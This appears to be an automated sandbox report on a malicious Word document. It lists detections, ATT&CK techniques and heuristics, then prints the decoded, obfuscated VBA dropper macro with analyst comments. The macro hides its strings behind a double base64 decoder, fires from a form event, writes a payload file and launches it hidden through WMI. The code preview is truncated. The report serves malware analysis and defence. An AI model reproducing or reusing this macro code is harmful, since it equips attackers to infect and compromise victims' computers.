MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the use of CreateObject and GetObject, common for malware execution. The ClamAV detection 'Doc.Dropper.Agent-6840332-0' strongly suggests a dropper functionality. The VBA code appears to be obfuscated and attempts to decode a string, likely for a download URL or execution command, which is then used to fetch and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6840332-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6840332-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call
-
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access)
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5438 bytes |
| SHA-256: 56f97f50f1ff353b9f2ae55d7947989f3d1d0283f7c5bd969cb718bb4c58f87f | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"
Attribute VB_Control = "Kplkaz, 1, 1, MSForms, Label"
' Small integer constants behind meaningless names. In the visible code they
' double as Err.Raise error numbers in the base64 decoder and as plain 1/2
' literals elsewhere (InStr start position, Mid length) -- consistent with
' hiding ordinary numeric literals. yeworzuolv (0) is not referenced in the
' visible part of the module.
Const qruvnsndep = 2
Const roynjvqzwr = 1
Const yeworzuolv = 0
' Base64 decoder used to unpack the macro's strings. The caller routine
' dnecnzdfkscoqkuzbprj applies it twice in a row, so the strings it feeds are
' double base64-encoded. Every literal except the alphabet is produced by
' rlpkngnvtcar(), which is defined outside this excerpt; its arguments look
' like hex-encoded ASCII ("3d" -> "=", "30" -> "0", "2648" -> "&H"), so it is
' presumably a hex-to-text helper -- confirm against the full module.
' Parameter cshdchsb: base64 text; CR/LF, tabs and spaces are stripped first.
' Returns: the decoded bytes as a VBA string, one character per byte.
' Raises: Err.Raise roynjvqzwr (1) when the cleaned length is not a multiple
'         of 4; Err.Raise qruvnsndep (2) when a character is not in the
'         alphabet. The error source/description strings also come from
'         rlpkngnvtcar() and are not readable here.
Function adrjxyejashlspphmtdb(ByVal cshdchsb)
' Standard base64 alphabet, split into two literals (no contiguous alphabet
' string appears in the module).
Const Nbxjok = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi" & "jklmnopqrstuvwxyz0123456789+/"
Dim fezijdJdxH, sOut, fpwkzLM
' Whitespace is tolerated in the input and removed before length checking.
cshdchsb = Replace(cshdchsb, vbCrLf, "")
cshdchsb = Replace(cshdchsb, vbTab, "")
cshdchsb = Replace(cshdchsb, " ", "")
fezijdJdxH = Len(cshdchsb)
' Base64 is consumed in quartets, so the length must be a multiple of 4.
If fezijdJdxH Mod 4 <> 0 Then
Err.Raise roynjvqzwr, rlpkngnvtcar("4261736536344465636f64") & rlpkngnvtcar("65"), rlpkngnvtcar("426164") & rlpkngnvtcar("2042617365363420737472696e672e")
Exit Function
End If
' One 4-character group -> up to 3 output bytes per iteration.
For fpwkzLM = 1 To fezijdJdxH Step 4
Dim UEIkxhedu, SNWKndzue, DHWOcjizez, wuzkdJSslo, pzoskNksz, auspeudNzL
' UEIkxhedu = number of output bytes for this group; each padding character
' found below reduces it by one.
UEIkxhedu = 3
' pzoskNksz accumulates the 24-bit value of the group.
pzoskNksz = 0
For SNWKndzue = 0 To 3
DHWOcjizez = Mid(cshdchsb, fpwkzLM + SNWKndzue, roynjvqzwr)
' rlpkngnvtcar("3d") is presumably "=", the padding character.
If DHWOcjizez = rlpkngnvtcar("3d") Then
UEIkxhedu = UEIkxhedu - 1
wuzkdJSslo = 0
Else
' 0-based position in the alphabet; InStr returns 0 (so -1 here) when the
' character is not found. vbBinaryCompare keeps the lookup case-sensitive.
wuzkdJSslo = InStr(roynjvqzwr, Nbxjok, DHWOcjizez, vbBinaryCompare) - 1
End If
If wuzkdJSslo = -1 Then
Err.Raise qruvnsndep, rlpkngnvtcar("4261") & rlpkngnvtcar("736536344465636f6465"), rlpkngnvtcar("4261642063686172616374657220496e20") & rlpkngnvtcar("42617365363420737472696e672e")
Exit Function
End If
' Shift in 6 bits per character.
pzoskNksz = 64 * pzoskNksz + wuzkdJSslo
Next
' Render the 24-bit value as exactly 6 hex digits (left-padded with
' rlpkngnvtcar("30"), presumably "0") so the three bytes can be sliced out
' as 2-digit pairs.
pzoskNksz = Hex(pzoskNksz)
pzoskNksz = String(6 - Len(pzoskNksz), rlpkngnvtcar("30")) & pzoskNksz
' Each pair is prefixed with rlpkngnvtcar("2648"), presumably "&H", so that
' CByte parses it as a hex literal; Chr turns the byte into a character.
auspeudNzL = Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, roynjvqzwr, qruvnsndep))) + _
Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, 3, qruvnsndep))) + _
Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, 5, qruvnsndep)))
' Keep only the bytes not cancelled by padding.
sOut = sOut & Left(auspeudNzL, UEIkxhedu)
Next
adrjxyejashlspphmtdb = sOut
End Function
' Layout event handler of "Frame1", the MSForms Frame declared in the
' VB_Control attribute at the top of the module. Control events of this kind
' fire as the document renders, so this is presumably the macro's
' auto-execute entry point in place of AutoOpen/Document_Open -- confirm by
' dynamic analysis; note that the report's heuristics list no auto-exec
' finding, which a detection rule keyed only on AutoOpen-style names would
' also miss.
' The only effective statement is the Call below; the assignments around it
' are not read again in this procedure and look like filler.
Sub Frame1_Layout()
aYceLzaRWBzdRqDWb = "nwRNUstboFexLUHbd"
YTKJWDTRZtkXa = Array(20, 15, 20)
GAvuEHVfQysLEj = 1187024257
' Hands off to the routine that writes and launches the payload.
Call dnecnzdfkscoqkuzbprj
AeqRGHLlmVhwHBoKd = "zKtiNQWmONiZjV"
ctXVLbUCmpVfT = "LuQcBfcRfGJmZIWbU"
OPPrxGHgqouNQe = 1914037291
VhdjxdXMbJYoLx = 2068248205
End Sub
Sub dnecnzdfkscoqkuzbprj()
Const DKPP_NU = 0
sfsnisvklweghpsa = rlpkngnvtcar("2e")
Set xzsgawvtfxgywzero = GetObject(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5a444a7364574a585a48526b53453032") & rlpkngnvtcar("57455a3350513d3d"))) & sfsnisvklweghpsa & adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5745684b646d497a556d4e5a4d6d78305a4770") & rlpkngnvtcar("4a50513d3d"))))
bsxsunwliuss = Environ(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5a45645764474e425054") & rlpkngnvtcar("303d")))) & adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5745645765574e744f58") & rlpkngnvtcar("6c6a655456705756685250513d3d")))
dytnzuxutll = adrjxyejashlspphmtdb(Kplkaz & Okszo & Pklirop)
aGfxRShgJvuIiyTQf = 36
oiKVesAQrMBKVTi = "JXiQbVRsuPZLU"
Set umrdusymgbinrkftb = CreateObject(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("56") & rlpkngnvtcar("544a4f65574659516a4268567a56755447746163474a48566c526c57453477576c637855466c746347785a4d314539"))))
Dim xkrzosmvcwqgjemf As Object
Set xkrzosmvcwqgjemf = umrdusymgbinrkftb.CreateTextFile(bsxsunwliuss)
xkrzosmvcwqgjemf.WriteLine dytnzuxutll
OarmHjHpdHCvL = "sgmhzEeJkAZjWtG"
jqotZFrXtxieQimo = 1900470925
xkrzosmvcwqgjemf.Close
Set hvcjhbccksmkz = xzsgawvtfxgywzero.Get(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("566a4a7364553136536d5a56534570325754") & rlpkngnvtcar("4a57656d4d78546a425a57456f775a46684250513d3d"))))
Set daovfqgvlvkrlipxijho = hvcjhbccksmkz.SpawnInstance_
geCrMKOADRPpQZ = "eZGrSeXDuHjVFvy"
whQCjggoliwSV = "IabvKkbGjPicZMYr"
YGqLtrvPMriXTUsG = 815423797
ILeQuXWajoJEzSyd = 1683081379
daovfqgvlvkrlipxijho.ShowWindow = DKPP_NU
Set qixdymojrzprxaidiahz = GetObject(adrjxyejashlspphmtd
... (truncated)